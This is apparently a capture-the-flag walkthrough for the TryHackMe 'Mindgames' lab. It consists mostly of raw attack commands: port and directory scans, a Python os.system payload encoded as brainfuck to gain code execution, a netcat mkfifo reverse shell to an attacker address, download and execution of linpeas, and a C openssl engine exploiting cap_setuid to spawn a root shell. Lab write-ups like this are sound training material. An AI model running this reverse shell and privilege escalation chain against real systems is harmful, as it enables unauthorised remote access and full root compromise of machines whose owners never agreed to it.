Mindgames
Room Link: https://tryhackme.com/room/mindgames
Initial Scan
Kali
nmap -A $VICTIM

Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP
Nothing really found, the pages listed are all broken links
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt


https://www.dcode.fr/brainfuck-language

Encode
__import__("os").system("ls -la")


Kali
nc -lvnp 4242
Encode
__import__("os").system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.231.107 4242 >/tmp/f")



Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
LinPeas
Kali
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python2 -m SimpleHTTPServer 81
Victim
cd /tmp/
wget http://$KALI:81/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Privilege Escalation
Exploit: https://chaudhary1337.github.io/p/how-to-openssl-cap_setuid-ep-privesc-exploit/
We found openssl has cap_setuid+ep in Linpeas

We can also run the below command to validate
Victim
getcap -r / 2>/dev/null

openssl-exploit-engine.c
#include <openssl/engine.h>
static int bind(ENGINE *e, const char *id)
{
setuid(0); setgid(0);
system("/bin/bash");
}
IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()
Kali
gcc -fPIC -o openssl-exploit-engine.o -c openssl-exploit-engine.c
gcc -shared -o openssl-exploit-engine.so -lcrypto openssl-exploit-engine.o
python2 -m SimpleHTTPServer 81
Victim
cd /tmp/
wget http://$KALI:81/openssl-exploit-engine.so
openssl req -engine ./openssl-exploit-engine.so

Last updated